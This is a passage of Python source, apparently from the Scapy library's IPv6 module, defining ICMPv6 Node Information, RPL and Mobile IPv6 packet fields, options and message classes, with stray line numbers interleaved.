            inet_pton(socket.AF_INET6, x.decode())
            return (0, x.decode())
        except Exception:
            pass
        # Try IPv4
        try:
            inet_pton(socket.AF_INET, x.decode())
            return (2, x.decode())
        except Exception:
            pass
        # Try DNS
        if x is None:
            x = b""
        x = names2dnsrepr(x)
        return (1, x)

    def i2repr(self, pkt, x):
        t, val = x
        if t == 1:  # DNS Name
            # we don't use dnsrepr2names() to deal with
            # possible weird data extracted info
            res = []
            while val:
                tmp_len = orb(val[0])
                val = val[1:]
                if tmp_len == 0:
                    break
                res.append(plain_str(val[:tmp_len]) + ".")
                val = val[tmp_len:]
            tmp = "".join(res)
            if tmp and tmp[-1] == '.':
                tmp = tmp[:-1]
            return tmp
        return repr(val)

    def getfield(self, pkt, s):
        # The packet's qtype and code fields decide how the data is read:
        # nothing for NOOP, otherwise a 16-byte IPv6 address (code 0), a
        # 4-byte IPv4 address (code 2) or the rest of the buffer as a name.
        qtype = getattr(pkt, "qtype")
        if qtype == 0:  # NOOP
            return s, (0, b"")
        else:
            code = getattr(pkt, "code")
            if code == 0:  # IPv6 Addr
                return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
            elif code == 2:  # IPv4 Addr
                return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
            else:  # Name or Unknown
                return b"", (1, s)

    def addfield(self, pkt, s, val):
        # A missing value is built as an empty name.
        if ((isinstance(val, tuple) and val[1] is None) or
                val is None):
            val = (1, b"")
        t = val[0]
        if t == 1:
            return s + val[1]
        elif t == 0:
            return s + inet_pton(socket.AF_INET6, val[1])
        else:
            return s + inet_pton(socket.AF_INET, val[1])

2546 

2547 

class NIQueryCodeField(ByteEnumField):
    # Code field of Node Information queries. When left unset (None), the
    # code is derived from the kind stored in the packet's "data" field.
    def i2m(self, pkt, x):
        if x is not None:
            return x
        d = pkt.getfieldval("data")
        if d is None:
            return 1
        kind = d[0]
        if kind == 0:  # IPv6 address
            return 0
        if kind == 2:  # IPv4 address
            return 2
        # Name (kind 1) and anything else
        return 1

2563 

2564 

2565_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"} 

2566 

2567# _niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses", 

2568# 8: "Link-local addresses", 16: "Site-local addresses", 

2569# 32: "Global addresses" } 

2570 

2571# "This NI type has no defined flags and never has a Data Field". Used 

2572# to know if the destination is up and implements NI protocol. 

2573 

2574 

class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
    # ICMPv6 type 139 with qtype 0. The other query classes below reuse
    # this layout and only override defaults.
    name = "ICMPv6 Node Information Query - NOOP Query"
    fields_desc = [
        ByteEnumField("type", 139, icmp6types),
        NIQueryCodeField("code", None, _niquery_code),
        XShortField("cksum", None),
        ShortEnumField("qtype", 0, icmp6_niqtypes),
        BitField("unused", 0, 10),
        FlagsField("flags", 0, 6, "TACLSG"),
        NonceField("nonce", None),
        NIQueryDataField("data", None),
    ]

2585 

2586 

class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
    # Same layout as the NOOP query, with qtype defaulting to 2.
    qtype = 2
    name = "ICMPv6 Node Information Query - IPv6 Name Query"

2590 

2591# We ask for the IPv6 address of the peer 

2592 

2593 

class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
    # Same layout as the NOOP query, with qtype defaulting to 3 and flags
    # defaulting to 0x3E.
    qtype = 3
    flags = 0x3E
    name = "ICMPv6 Node Information Query - IPv6 Address Query"

2598 

2599 

class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
    # Same layout as the NOOP query, with qtype defaulting to 4.
    qtype = 4
    name = "ICMPv6 Node Information Query - IPv4 Address Query"

2603 

2604 

2605_nireply_code = {0: "Successful Reply", 

2606 1: "Response Refusal", 

2607 3: "Unknown query type"} 

2608 

2609_nireply_flags = {1: "Reply set incomplete", 

2610 2: "All unicast addresses", 

2611 4: "IPv4 addresses", 

2612 8: "Link-local addresses", 

2613 16: "Site-local addresses", 

2614 32: "Global addresses"} 

2615 

2616# Internal repr is one of those : 

2617# (0, "some string") : unknown qtype value are mapped to that one 

2618# (3, [ (ttl, ip6), ... ]) 

2619# (4, [ (ttl, ip4), ... ]) 

2620# (2, [ttl, dns_names]) : dns_names is one string that contains 

2621# all the DNS names. Internally it is kept ready to be sent 

2622# (undissected). i2repr() decode it for user. This is to 

2623# make build after dissection bijective. 

2624# 

2625# I also merged getfield() and m2i(), and addfield() and i2m(). 

2626 

2627 

class NIReplyDataField(StrField):
    # Data field of Node Information replies. The internal value is a
    # (qtype, value) pair: (2, [ttl, dns_bytes]), (3, [(ttl, ip6), ...]),
    # (4, [(ttl, ip4), ...]) or (0, raw) for everything else.

    def i2h(self, pkt, x):
        if x is None:
            return x
        t, val = x
        if t == 2:
            # Present DNS replies as [ttl, name1, name2, ...]
            ttl, dnsnames = val
            val = [ttl] + dnsrepr2names(dnsnames)
        return val

    def h2i(self, pkt, x):
        # An explicit (qtype, value) tuple wins; otherwise the packet's
        # qtype is used, and 0 (raw string) when there is no packet.
        if isinstance(x, tuple):
            qtype, x = x[0], x[1]
        elif pkt is not None:
            qtype = pkt.qtype
        else:
            qtype = 0

        # From that point on, x is the value (second element of the tuple)

        if qtype == 2:  # DNS name
            if isinstance(x, (str, bytes)):  # listify the string
                x = [x]
            if isinstance(x, list):
                x = [val.encode() if isinstance(val, str) else val for val in x]  # noqa: E501
            # A leading int is the TTL; without one, TTL is 0
            if x and isinstance(x[0], int):
                ttl, names = x[0], x[1:]
            else:
                ttl, names = 0, x
            return (2, [ttl, names2dnsrepr(names)])

        if qtype in [3, 4]:  # IPv4 or IPv6 addr
            if not isinstance(x, list):
                x = [x]  # User directly provided an IP, instead of list

            def fixvalue(x):
                # List elements are not tuples, user probably
                # omitted ttl value : we will use 0 instead
                if not isinstance(x, tuple):
                    x = (0, x)
                # Decode bytes
                if isinstance(x[1], bytes):
                    x = (x[0], x[1].decode())
                return x

            return (qtype, [fixvalue(d) for d in x])

        return (qtype, x)

    def addfield(self, pkt, s, val):
        t, tmp = val
        if tmp is None:
            tmp = b""
        if t == 2:
            ttl, dnsstr = tmp
            return s + struct.pack("!I", ttl) + dnsstr
        if t == 3:
            return s + b"".join(
                struct.pack("!I", entry[0]) + inet_pton(socket.AF_INET6, entry[1])  # noqa: E501
                for entry in tmp
            )
        if t == 4:
            return s + b"".join(
                struct.pack("!I", entry[0]) + inet_pton(socket.AF_INET, entry[1])  # noqa: E501
                for entry in tmp
            )
        return s + tmp

    def getfield(self, pkt, s):
        # Only successful replies (code 0) carry data that is decoded
        if getattr(pkt, "code") != 0:
            return s, (0, b"")

        qtype = getattr(pkt, "qtype")
        if qtype == 0:  # NOOP
            return s, (0, b"")

        if qtype == 2:
            if len(s) < 4:
                return s, (0, b"")
            ttl = struct.unpack("!I", s[:4])[0]
            return b"", (2, [ttl, s[4:]])

        if qtype == 3:  # IPv6 addresses with TTLs
            # XXX TODO : get the real length
            entries = []
            while len(s) >= 20:  # 4 + 16
                ttl = struct.unpack("!I", s[:4])[0]
                ip = inet_ntop(socket.AF_INET6, s[4:20])
                entries.append((ttl, ip))
                s = s[20:]
            return s, (3, entries)

        if qtype == 4:  # IPv4 addresses with TTLs
            # XXX TODO : get the real length
            entries = []
            while len(s) >= 8:  # 4 + 4
                ttl = struct.unpack("!I", s[:4])[0]
                ip = inet_ntop(socket.AF_INET, s[4:8])
                entries.append((ttl, ip))
                s = s[8:]
            return s, (4, entries)

        # XXX TODO : implement me and deal with real length
        return b"", (0, s)

    def i2repr(self, pkt, x):
        if x is None:
            return "[]"

        if not (isinstance(x, tuple) and len(x) == 2):
            return repr(x)  # XXX should not happen

        t, val = x
        if t == 2:  # DNS names
            ttl, dnsstr = val
            decoded = dnsrepr2names(dnsstr)
            return "ttl:%d %s" % (ttl, ",".join(plain_str(n) for n in decoded))
        if t == 3 or t == 4:
            return "[ %s ]" % (", ".join(
                "(%d, %s)" % (entry[0], entry[1]) for entry in val
            ))
        return repr(val)

2751 

2752# By default, sent responses have code set to 0 (successful) 

2753 

2754 

class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
    # ICMPv6 type 140 with code 0 and qtype 0. The other reply classes
    # below reuse this layout and only override defaults.
    name = "ICMPv6 Node Information Reply - NOOP Reply"
    fields_desc = [
        ByteEnumField("type", 140, icmp6types),
        ByteEnumField("code", 0, _nireply_code),
        XShortField("cksum", None),
        ShortEnumField("qtype", 0, icmp6_niqtypes),
        BitField("unused", 0, 10),
        FlagsField("flags", 0, 6, "TACLSG"),
        NonceField("nonce", None),
        NIReplyDataField("data", None),
    ]

2765 

2766 

class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
    # Same layout as the NOOP reply, with qtype defaulting to 2.
    qtype = 2
    name = "ICMPv6 Node Information Reply - Node Names"

2770 

2771 

class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
    # Same layout as the NOOP reply, with qtype defaulting to 3.
    qtype = 3
    name = "ICMPv6 Node Information Reply - IPv6 addresses"

2775 

2776 

class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
    # Same layout as the NOOP reply, with qtype defaulting to 4.
    qtype = 4
    name = "ICMPv6 Node Information Reply - IPv4 addresses"

2780 

2781 

class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
    # Same layout as the NOOP reply, with code defaulting to 1.
    code = 1
    name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"

2785 

2786 

class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
    # Same layout as the NOOP reply, with code defaulting to 2.
    code = 2
    name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"

2790 

2791 

def _niquery_guesser(p):
    # Pick the Node Information class for raw ICMPv6 bytes "p", based on
    # the type byte, the code byte and the 16-bit qtype at offset 4.
    # Falls back to conf.raw_layer when nothing matches.
    icmp_type = orb(p[0])

    if icmp_type == 139:  # Node Info Query specific stuff
        if len(p) > 6:
            qtype, = struct.unpack("!H", p[4:6])
            return {0: ICMPv6NIQueryNOOP,
                    2: ICMPv6NIQueryName,
                    3: ICMPv6NIQueryIPv6,
                    4: ICMPv6NIQueryIPv4}.get(qtype, conf.raw_layer)
        return conf.raw_layer

    if icmp_type == 140:  # Node Info Reply specific stuff
        code = orb(p[1])
        if code == 0:
            if len(p) > 6:
                qtype, = struct.unpack("!H", p[4:6])
                return {2: ICMPv6NIReplyName,
                        3: ICMPv6NIReplyIPv6,
                        4: ICMPv6NIReplyIPv4}.get(qtype, ICMPv6NIReplyNOOP)
            return conf.raw_layer
        if code == 1:
            return ICMPv6NIReplyRefuse
        if code == 2:
            return ICMPv6NIReplyUnknown

    return conf.raw_layer

2815 

2816 

2817############################################################################# 

2818############################################################################# 

2819# Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550) # 

2820############################################################################# 

2821############################################################################# 

2822 

2823# https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes 

# Names of the RPL control message codes known to this module.
# Codes 4 ("P2P-DRO"), 5 ("P2P-DRO-ACK") and 6 ("Measurement") are
# intentionally left out of the mapping.
rplcodes = {
    0: "DIS",
    1: "DIO",
    2: "DAO",
    3: "DAO-ACK",
    7: "DCO",
    8: "DCO-ACK",
}

2833 

2834 

class ICMPv6RPL(_ICMPv6):  # RFC 6550
    """ICMPv6 header of an RPL control message (type 155).

    When stacked on IPv6, the next header defaults to 58 and the
    destination to ff02::1a.
    """

    name = 'RPL'
    fields_desc = [
        ByteEnumField("type", 155, icmp6types),
        ByteEnumField("code", 0, rplcodes),
        XShortField("cksum", None),
    ]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}}

2841 

2842 

2843############################################################################# 

2844############################################################################# 

2845# Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) # 

2846############################################################################# 

2847############################################################################# 

2848 

2849# Mobile IPv6 ICMPv6 related classes 

2850 

class ICMPv6HAADRequest(_ICMPv6):
    """ICMPv6 Home Agent Address Discovery Request (type 144)."""

    name = 'ICMPv6 Home Agent Address Discovery Request'
    fields_desc = [ByteEnumField("type", 144, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   BitEnumField("R", 1, 1, {1: 'MR'}),
                   XBitField("res", 0, 15)]

    def hashret(self):
        """Return the 2-byte identifier followed by the payload's hash.

        An unset identifier (``None``, the field default) is hashed as 0
        instead of raising ``struct.error``.
        """
        return struct.pack("!H", self.id or 0) + self.payload.hashret()

2862 

2863 

class ICMPv6HAADReply(_ICMPv6):
    """ICMPv6 Home Agent Address Discovery Reply (type 145)."""

    name = 'ICMPv6 Home Agent Address Discovery Reply'
    fields_desc = [ByteEnumField("type", 145, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   BitEnumField("R", 1, 1, {1: 'MR'}),
                   XBitField("res", 0, 15),
                   IP6ListField('addresses', None)]

    def hashret(self):
        """Return the 2-byte identifier followed by the payload's hash.

        An unset identifier (``None``) is hashed as 0 instead of raising
        ``struct.error``.
        """
        return struct.pack("!H", self.id or 0) + self.payload.hashret()

    def answers(self, other):
        """Tell whether this reply matches the HAAD request ``other``.

        Returns 0 when ``other`` is not an ICMPv6HAADRequest, otherwise the
        result of comparing both identifiers (an unset one counts as 0).
        """
        if not isinstance(other, ICMPv6HAADRequest):
            return 0
        return (self.id or 0) == (other.id or 0)

2881 

2882 

class ICMPv6MPSol(_ICMPv6):
    """ICMPv6 Mobile Prefix Solicitation (type 146)."""

    name = 'ICMPv6 Mobile Prefix Solicitation'
    fields_desc = [ByteEnumField("type", 146, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   XShortField("res", 0)]

    def hashret(self):
        """Return the 2-byte identifier, like ICMPv6MPAdv.hashret() does.

        The method used to be spelled ``_hashret`` and therefore never
        overrode the inherited ``hashret``. An unset identifier (``None``)
        is hashed as 0.
        """
        return struct.pack("!H", self.id or 0)

    # Former (misspelled) name, kept so existing callers keep working.
    _hashret = hashret

2893 

2894 

class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
    """ICMPv6 Mobile Prefix Advertisement (type 147)."""

    name = 'ICMPv6 Mobile Prefix Advertisement'
    fields_desc = [ByteEnumField("type", 147, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}),
                   XBitField("res", 0, 14)]

    def hashret(self):
        """Return the 2-byte identifier.

        An unset identifier (``None``) is hashed as 0 instead of raising
        ``struct.error``.
        """
        return struct.pack("!H", self.id or 0)

    def answers(self, other):
        """Return True when ``other`` is a Mobile Prefix Solicitation."""
        return isinstance(other, ICMPv6MPSol)

2909 

2910# Mobile IPv6 Options classes 

2911 

2912 

2913_mobopttypes = {2: "Binding Refresh Advice", 

2914 3: "Alternate Care-of Address", 

2915 4: "Nonce Indices", 

2916 5: "Binding Authorization Data", 

2917 6: "Mobile Network Prefix (RFC3963)", 

2918 7: "Link-Layer Address (RFC4068)", 

2919 8: "Mobile Node Identifier (RFC4283)", 

2920 9: "Mobility Message Authentication (RFC4285)", 

2921 10: "Replay Protection (RFC4285)", 

2922 11: "CGA Parameters Request (RFC4866)", 

2923 12: "CGA Parameters (RFC4866)", 

2924 13: "Signature (RFC4866)", 

2925 14: "Home Keygen Token (RFC4866)", 

2926 15: "Care-of Test Init (RFC4866)", 

2927 16: "Care-of Test (RFC4866)"} 

2928 

2929 

class _MIP6OptAlign(Packet):
    """Base class of the Mobile IPv6 options, handling their alignment.

    An option must start at an offset of the form x*n+y. Subclasses only
    provide ``x`` and ``y`` as class attributes (x=0 and y=0 mean that no
    alignment is required); this class derives how many padding bytes
    (Pad1 / PadN) are needed before the option.
    """

    __slots__ = ["x", "y"]

    def alignment_delta(self, curpos):
        """Return the padding needed so the option starts at an x*n+y offset.

        ``curpos`` is the current offset; 0 is returned when the option has
        no alignment requirement.
        """
        step, shift = self.x, self.y
        if step == 0 and shift == 0:
            return 0
        # Smallest n such that step * n + shift >= curpos.
        slots = (curpos - shift + step - 1) // step
        return step * slots + shift - curpos

    def extract_padding(self, p):
        """Treat all remaining bytes ``p`` as padding, none as payload."""
        return b"", p

2949 

2950 

class MIP6OptBRAdvice(_MIP6OptAlign):
    """Binding Refresh Advice mobility option (type 2)."""

    name = 'Mobile IPv6 Option - Binding Refresh Advice'
    fields_desc = [
        ByteEnumField('otype', 2, _mobopttypes),
        ByteField('olen', 2),
        ShortField('rinter', 0),
    ]
    # alignment requirement: 2n
    x = 2
    y = 0

2958 

2959 

class MIP6OptAltCoA(_MIP6OptAlign):
    """Alternate Care-of Address mobility option (type 3)."""

    name = 'MIPv6 Option - Alternate Care-of Address'
    fields_desc = [
        ByteEnumField('otype', 3, _mobopttypes),
        ByteField('olen', 16),
        IP6Field("acoa", "::"),
    ]
    # alignment requirement: 8n+6
    x = 8
    y = 6

2967 

2968 

class MIP6OptNonceIndices(_MIP6OptAlign):
    """Nonce Indices mobility option (type 4).

    The option data is two 16-bit indices (home and care-of nonce index),
    i.e. 4 bytes, which is what ``olen`` now defaults to (RFC 6275,
    section 6.2.6). The former default of 16 did not match the option body.
    """

    name = 'MIPv6 Option - Nonce Indices'
    fields_desc = [ByteEnumField('otype', 4, _mobopttypes),
                   ByteField('olen', 4),
                   ShortField('hni', 0),
                   ShortField('coni', 0)]
    x = 2
    y = 0  # alignment requirement: 2n

2977 

2978 

class MIP6OptBindingAuthData(_MIP6OptAlign):
    """Binding Authorization Data mobility option (type 5).

    ``olen`` is the length in bytes of the authenticator; the field here
    is 96 bits wide, so the default is 12 (RFC 6275, section 6.2.7). The
    former default of 16 did not match the option body.
    """

    name = 'MIPv6 Option - Binding Authorization Data'
    fields_desc = [ByteEnumField('otype', 5, _mobopttypes),
                   ByteField('olen', 12),
                   BitField('authenticator', 0, 96)]
    x = 8
    y = 2  # alignment requirement: 8n+2

2986 

2987 

class MIP6OptMobNetPrefix(_MIP6OptAlign):  # NEMO - RFC 3963
    """Mobile Network Prefix option (type 6)."""

    name = 'NEMO Option - Mobile Network Prefix'
    fields_desc = [
        ByteEnumField("otype", 6, _mobopttypes),
        ByteField("olen", 18),
        ByteField("reserved", 0),
        ByteField("plen", 64),
        IP6Field("prefix", "::"),
    ]
    # alignment requirement: 8n+4
    x = 8
    y = 4

2997 

2998 

class MIP6OptLLAddr(_MIP6OptAlign):  # Sect 6.4.4 of RFC 4068
    """Mobility Header Link-Layer Address option (type 7)."""

    name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
    fields_desc = [
        ByteEnumField("otype", 7, _mobopttypes),
        ByteField("olen", 7),
        ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
        ByteField("pad", 0),
        MACField("lla", ETHER_ANY),  # Only support ethernet
    ]
    # alignment requirement: none
    x = 0
    y = 0

3008 

3009 

class MIP6OptMNID(_MIP6OptAlign):  # RFC 4283
    """Mobile Node Identifier option (type 8).

    ``olen`` is computed as the length of ``id`` plus one byte for the
    subtype.
    """

    name = "MIPv6 Option - Mobile Node Identifier"
    fields_desc = [
        ByteEnumField("otype", 8, _mobopttypes),
        FieldLenField("olen", None, length_of="id", fmt="B",
                      adjust=lambda pkt, x: x + 1),
        ByteEnumField("subtype", 1, {1: "NAI"}),
        StrLenField("id", "",
                    length_from=lambda pkt: pkt.olen - 1),
    ]
    # alignment requirement: none
    x = 0
    y = 0

3020 

3021# We only support decoding and basic build. Automatic HMAC computation is 

3022# too much work for our current needs. It is left to the user (I mean ... 

3023# you). --arno 

3024 

3025 

class MIP6OptMsgAuth(_MIP6OptAlign):  # RFC 4285 (Sect. 5)
    """Mobility Message Authentication option (type 9).

    ``olen`` is computed as the length of ``authdata`` plus 5 bytes
    (1 for the subtype, 4 for the SPI). The authentication data itself
    is never computed: it has to be supplied by the caller.
    """

    name = "MIPv6 Option - Mobility Message Authentication"
    fields_desc = [
        ByteEnumField("otype", 9, _mobopttypes),
        FieldLenField("olen", None, length_of="authdata", fmt="B",
                      adjust=lambda pkt, x: x + 5),
        ByteEnumField("subtype", 1, {
            1: "MN-HA authentication mobility option",
            2: "MN-AAA authentication mobility option",
        }),
        IntField("mspi", None),
        StrLenField("authdata", "A" * 12,
                    length_from=lambda pkt: pkt.olen - 5),
    ]
    # alignment requirement: 4n+1
    x = 4
    y = 1

3038 

3039# Extracted from RFC 1305 (NTP) : 

3040# NTP timestamps are represented as a 64-bit unsigned fixed-point number, 

3041# in seconds relative to 0h on 1 January 1900. The integer part is in the 

3042# first 32 bits and the fraction part in the last 32 bits. 

3043 

3044 

class NTPTimestampField(LongField):
    """64-bit NTP timestamp: 32-bit seconds since 1900-01-01 00:00 UTC
    followed by a 32-bit binary fraction of a second."""

    def i2repr(self, pkt, x):
        """Return a human-readable UTC date for the NTP timestamp ``x``.

        Values earlier than roughly 50 years after the NTP epoch are not
        converted and are only reported with their raw integer value.
        """
        if x < ((50 * 31536000) << 32):
            return "Some date a few decades ago (%d)" % x

        # Seconds between the NTP epoch (1900-01-01) and the Unix epoch
        # (1970-01-01): 70 years including 17 leap days, i.e.
        # 25567 * 86400. The previous constant (2209075761) was off by
        # about a day.
        delta = -2208988800
        i = int(x >> 32)
        j = float(x & 0xffffffff) * 2.0**-32
        res = i + j + delta
        t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res))

        return "%s (%d)" % (t, x)

3059 

3060 

class MIP6OptReplayProtection(_MIP6OptAlign):  # RFC 4285 (Sect. 6)
    """Replay Protection option (type 10) carrying an NTP timestamp."""

    name = "MIPv6 option - Replay Protection"
    fields_desc = [
        ByteEnumField("otype", 10, _mobopttypes),
        ByteField("olen", 8),
        NTPTimestampField("timestamp", 0),
    ]
    # alignment requirement: 8n+2
    x = 8
    y = 2

3068 

3069 

class MIP6OptCGAParamsReq(_MIP6OptAlign):  # RFC 4866 (Sect. 5.6)
    """CGA Parameters Request option (type 11); it carries no data."""

    name = "MIPv6 option - CGA Parameters Request"
    fields_desc = [
        ByteEnumField("otype", 11, _mobopttypes),
        ByteField("olen", 0),
    ]
    # alignment requirement: none
    x = 0
    y = 0

3076 

3077# XXX TODO: deal with CGA param fragmentation and build of defragmented 

3078# XXX version. Passing of a big CGAParam structure should be 

3079# XXX simplified. Make it hold packets, by the way --arno 

3080 

3081 

class MIP6OptCGAParams(_MIP6OptAlign):  # RFC 4866 (Sect. 5.1)
    """CGA Parameters option (type 12); ``olen`` is the length of
    ``cgaparams``."""

    name = "MIPv6 option - CGA Parameters"
    fields_desc = [
        ByteEnumField("otype", 12, _mobopttypes),
        FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
        StrLenField("cgaparams", "",
                    length_from=lambda pkt: pkt.olen),
    ]
    # alignment requirement: none
    x = 0
    y = 0

3090 

3091 

class MIP6OptSignature(_MIP6OptAlign):  # RFC 4866 (Sect. 5.2)
    """Signature option (type 13); ``olen`` is the length of ``sig``."""

    name = "MIPv6 option - Signature"
    fields_desc = [
        ByteEnumField("otype", 13, _mobopttypes),
        FieldLenField("olen", None, length_of="sig", fmt="B"),
        StrLenField("sig", "",
                    length_from=lambda pkt: pkt.olen),
    ]
    # alignment requirement: none
    x = 0
    y = 0

3100 

3101 

class MIP6OptHomeKeygenToken(_MIP6OptAlign):  # RFC 4866 (Sect. 5.3)
    """Home Keygen Token option (type 14); ``olen`` is the length of
    ``hkt``."""

    name = "MIPv6 option - Home Keygen Token"
    fields_desc = [
        ByteEnumField("otype", 14, _mobopttypes),
        FieldLenField("olen", None, length_of="hkt", fmt="B"),
        StrLenField("hkt", "",
                    length_from=lambda pkt: pkt.olen),
    ]
    # alignment requirement: none
    x = 0
    y = 0

3110 

3111 

class MIP6OptCareOfTestInit(_MIP6OptAlign):  # RFC 4866 (Sect. 5.4)
    """Care-of Test Init option (type 15); it carries no data."""

    name = "MIPv6 option - Care-of Test Init"
    fields_desc = [
        ByteEnumField("otype", 15, _mobopttypes),
        ByteField("olen", 0),
    ]
    # alignment requirement: none
    x = 0
    y = 0

3118 

3119 

class MIP6OptCareOfTest(_MIP6OptAlign):  # RFC 4866 (Sect. 5.5)
    """Care-of Test option (type 16); ``olen`` is the length of ``cokt``,
    which defaults to eight null bytes."""

    name = "MIPv6 option - Care-of Test"
    fields_desc = [
        ByteEnumField("otype", 16, _mobopttypes),
        FieldLenField("olen", None, length_of="cokt", fmt="B"),
        StrLenField("cokt", b'\x00' * 8,
                    length_from=lambda pkt: pkt.olen),
    ]
    # alignment requirement: none
    x = 0
    y = 0

3128 

3129 

class MIP6OptUnknown(_MIP6OptAlign):
    """Generic mobility option, also acting as the dissection entry point.

    When built from raw bytes, the first byte (option type) selects the
    dedicated class registered in ``moboptcls``; this class is used for
    every type that is not registered there.
    """

    name = 'Scapy6 - Unknown Mobility Option'
    fields_desc = [
        ByteEnumField("otype", 6, _mobopttypes),
        FieldLenField("olen", None, length_of="odata", fmt="B"),
        StrLenField("odata", "",
                    length_from=lambda pkt: pkt.olen),
    ]
    # alignment requirement: none
    x = 0
    y = 0

    @classmethod
    def dispatch_hook(cls, _pkt=None, *_, **kargs):
        """Return the option class matching the first byte of ``_pkt``."""
        if not _pkt:
            return cls
        # First byte is the option type
        return moboptcls.get(orb(_pkt[0]), cls)

3146 

3147 

# Mobility option type -> class used to dissect it (looked up by
# MIP6OptUnknown.dispatch_hook).
moboptcls = {
    0: Pad1,
    1: PadN,
    2: MIP6OptBRAdvice,
    3: MIP6OptAltCoA,
    4: MIP6OptNonceIndices,
    5: MIP6OptBindingAuthData,
    6: MIP6OptMobNetPrefix,
    7: MIP6OptLLAddr,
    8: MIP6OptMNID,
    9: MIP6OptMsgAuth,
    10: MIP6OptReplayProtection,
    11: MIP6OptCGAParamsReq,
    12: MIP6OptCGAParams,
    13: MIP6OptSignature,
    14: MIP6OptHomeKeygenToken,
    15: MIP6OptCareOfTestInit,
    16: MIP6OptCareOfTest,
}

3165 

3166 

3167# Main Mobile IPv6 Classes 

3168 

# Short names of the Mobility Header message types ("mhtype" field).
mhtypes = {
    0: 'BRR',
    1: 'HoTI',
    2: 'CoTI',
    3: 'HoT',
    4: 'CoT',
    5: 'BU',
    6: 'BA',
    7: 'BE',
    8: 'Fast BU',
    9: 'Fast BA',
    10: 'Fast NA',
}

3180 

3181# From http://www.iana.org/assignments/mobility-parameters 

# Binding Acknowledgement status codes ("status" field of MIP6MH_BA).
bastatus = {
    0: 'Binding Update accepted',
    1: 'Accepted but prefix discovery necessary',
    128: 'Reason unspecified',
    129: 'Administratively prohibited',
    130: 'Insufficient resources',
    131: 'Home registration not supported',
    132: 'Not home subnet',
    133: 'Not home agent for this mobile node',
    134: 'Duplicate Address Detection failed',
    135: 'Sequence number out of window',
    136: 'Expired home nonce index',
    137: 'Expired care-of nonce index',
    138: 'Expired nonces',
    139: 'Registration type change disallowed',
    140: 'Mobile Router Operation not permitted',
    141: 'Invalid Prefix',
    142: 'Not Authorized for Prefix',
    143: 'Forwarding Setup failed (prefixes missing)',
    144: 'MIPV6-ID-MISMATCH',
    145: 'MIPV6-MESG-ID-REQD',
    146: 'MIPV6-AUTH-FAIL',
    147: 'Permanent home keygen token unavailable',
    148: 'CGA and signature verification failed',
    149: 'Permanent home keygen token exists',
    150: 'Non-null home nonce index expected',
}

3207 

3208 

class _MobilityHeader(Packet):
    """Common base of the Mobility Header messages.

    It supplies the build-time computation of the ``len`` and ``cksum``
    fields that the subclasses declare.
    """

    name = 'Dummy IPv6 Mobility Header'
    overload_fields = {IPv6: {"nh": 135}}

    def post_build(self, p, pay):
        """Append the payload, then patch the length and checksum bytes.

        The length (byte 1) is expressed in 8-byte units, not counting the
        first 8 bytes; the checksum (bytes 4-5) is computed with
        in6_chksum() for next header 135. Either one is only computed
        when the corresponding field is None.
        """
        p += pay

        hdr_len = self.len
        if hdr_len is None:
            hdr_len = (len(p) - 8) // 8
        p = p[:1] + struct.pack("B", hdr_len) + p[2:]

        cksum = self.cksum
        if cksum is None:
            cksum = in6_chksum(135, self.underlayer, p)
        p = p[:4] + struct.pack("!H", cksum) + p[6:]

        return p

3225 

3226 

class MIP6MH_Generic(_MobilityHeader):  # Mainly for decoding of unknown msg
    """Mobility Header with an opaque message body.

    ``len`` counts 8-byte units beyond the first 8 bytes, so the whole
    header is 8 * (len + 1) bytes long. Six of them are the fixed fields
    declared before ``msg``, which leaves 8 * len + 2 bytes for ``msg``
    (2 bytes, the default value, when len is 0).
    """

    name = "IPv6 Mobility Header - Generic Message"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   ByteField("len", None),
                   ByteEnumField("mhtype", None, mhtypes),
                   ByteField("res", None),
                   XShortField("cksum", None),
                   StrLenField("msg", b"\x00" * 2,
                               length_from=lambda pkt: 8 * pkt.len + 2)]

3236 

3237 

class MIP6MH_BRR(_MobilityHeader):
    """Mobility Header - Binding Refresh Request (mhtype 0)."""

    name = "IPv6 Mobility Header - Binding Refresh Request"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", 0, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        ShortField("res2", None),
        _PhantomAutoPadField("autopad", 1),  # autopad activated by default
        _OptionsField("options", [], MIP6OptUnknown, 8,
                      length_from=lambda pkt: 8 * pkt.len),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Return the constant hash shared by BRR, BU and BA.

        Hack: the three classes return the very same value because a BA
        has to be matched with a BU, and a BU with a BRR.
        """
        return b"\x00\x08\x09"

3256 

3257 

class MIP6MH_HoTI(_MobilityHeader):
